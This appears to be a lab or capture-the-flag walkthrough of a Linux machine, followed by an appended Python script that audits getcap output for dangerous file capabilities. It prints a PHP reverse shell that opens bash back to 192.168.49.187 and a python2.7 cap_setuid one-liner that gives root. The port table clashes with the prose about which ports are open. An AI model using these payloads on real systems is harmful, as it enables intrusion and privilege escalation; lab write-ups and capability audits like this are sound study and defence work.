Machine IP →
Nmap scan →
nmap -A -Pn -p- -T4 -o nmap.txt 192.168.51.83
OS Detection →
OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel
| Port | Service | Other details (if any) |
|------|---------|------------------------|
| 22 | SSH | OpenSSH 7.9p1 Debian 10+deb10u2 (protocol 2.0) |
| 80 | HTTP | Apache httpd 2.4.38 ((Debian)) |
In total, the open ports are HTTP on 80, 7080, 8088 and 8715, FTP on port 21 and SSH on port 22.
GoBuster scan →
gobuster dir -u http://192.168.51.83 -f -w /home/tanq/installations/SecLists/Discovery/Web-Content/directory-list-lowercase-2.3-medium.txt -x html,php,txt
The scan of port 7080 revealed nothing. The scan of port 80 found the following →
- ebook/ (301)
- server-status (403)
Directories/files listed for port 8088 →
- cgi-bin/ (301)
- img/ (301)
- docs/ (301)
- css/ (301)
- protected/ (301)
- blocked/ (301)
The scan for the port 8715 revealed nothing.
Looking at the 200 status codes in the enumeration of port 8088, there are two files, including upload.php. They are linked and together provide an upload capability. A file uploaded through the port 8088 website becomes accessible on a different web server, the one running on port 8715. After testing txt and php files, php files are accessible directly while txt files require a password. Therefore, a php file can be used to create a reverse shell. Used the following php payload for the reverse shell →
<?php exec("/bin/bash -c 'bash -i >& /dev/tcp/192.168.49.187/3002 0>&1'"); ?>
A good resource for a reverse shell is Pentest Monkey PHP reverse shell.
The reverse shell therefore runs as the www-data user on the machine. This gives the user flag. Checked sudo capabilities for the user, but there were none. A search for setuid binaries did not return anything either.
The next check is for file capabilities. Used getcap -r / 2>/dev/null to list files with capabilities set. The result includes the entry →
/usr/bin/python2.7 = cap_setuid+ep.
Therefore, the following python code can be run through that binary to elevate privileges →
/usr/bin/python2.7 -c 'import os; os.setuid(0); os.system("/bin/bash")'. This gives the root flag.
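As an added defensive check (not part of the original writeup): a small Python audit that parses `getcap -r /` output and flags files whose capabilities allow privilege escalation, such as the cap_setuid+ep on python2.7 found above. The capability list, the interpreter pattern and the sample getcap lines are my own constructed assumptions, and both libcap output formats are handled since newer systems print a different form.

```python
import re
from typing import Dict, List, Optional, Tuple

# Capabilities that change identity or bypass DAC; on anything that runs arbitrary
# code (interpreter, shell) they are a direct path to root, as cap_setuid on python2.7 is.
PRIVESC_CAPS = {"cap_setuid", "cap_setgid", "cap_sys_admin", "cap_dac_override",
                "cap_dac_read_search", "cap_sys_ptrace", "cap_sys_module",
                "cap_chown", "cap_fowner"}
# Assumed list of interpreters / shells where a capability is effectively unbounded.
INTERPRETER_RE = re.compile(
    r"/(python[\d.]*|perl[\d.]*|ruby[\d.]*|php[\d.]*|node|bash|sh|dash|zsh)$")

def parse_getcap_line(line: str) -> Optional[Tuple[str, Dict[str, str]]]:
    """Return (path, {cap_name: flag letters}) for one line of `getcap -r /` output.
    Accepts "<path> = cap_a,cap_b+ep" (libcap < 2.41) and "<path> cap_a,cap_b=ep" (>= 2.41)."""
    line = line.strip()
    if " = " in line:
        path, text = line.split(" = ", 1)
    else:
        path, _, text = line.partition(" ")
    caps: Dict[str, str] = {}
    for clause in text.split():              # "cap_setuid+ep" or "cap_net_raw=ep"
        m = re.fullmatch(r"([\w,]+)[+=](\w*)", clause)
        if not m:
            return None                      # not a getcap line (or garbage)
        for name in m.group(1).split(","):
            caps[name] = m.group(2)
    return (path, caps) if caps else None

def audit(getcap_output: str) -> List[dict]:
    """One finding per file carrying a privilege-escalation capability; interpreters are
    rated critical. The remediation command is libcap's `setcap -r <file>`."""
    findings = []
    for line in getcap_output.splitlines():
        parsed = parse_getcap_line(line)
        if parsed is None:
            continue
        path, caps = parsed
        risky = sorted(set(caps) & PRIVESC_CAPS)
        if risky:
            severity = "critical" if INTERPRETER_RE.search(path) else "high"
            findings.append({"path": path, "caps": risky, "severity": severity,
                             "fix": f"setcap -r {path}"})
    return findings

# Constructed sample getcap output in both libcap formats (not from the target box).
SAMPLE_GETCAP = """\
/usr/bin/ping = cap_net_raw+ep
/usr/bin/python2.7 = cap_setuid+ep
/usr/bin/perl cap_setuid,cap_setgid=ep
/usr/sbin/tcpdump cap_net_admin,cap_net_raw=eip
"""
```

Running `audit(SAMPLE_GETCAP)` reports python2.7 and perl as critical and leaves ping and tcpdump alone, since cap_net_raw and cap_net_admin do not by themselves grant identity changes.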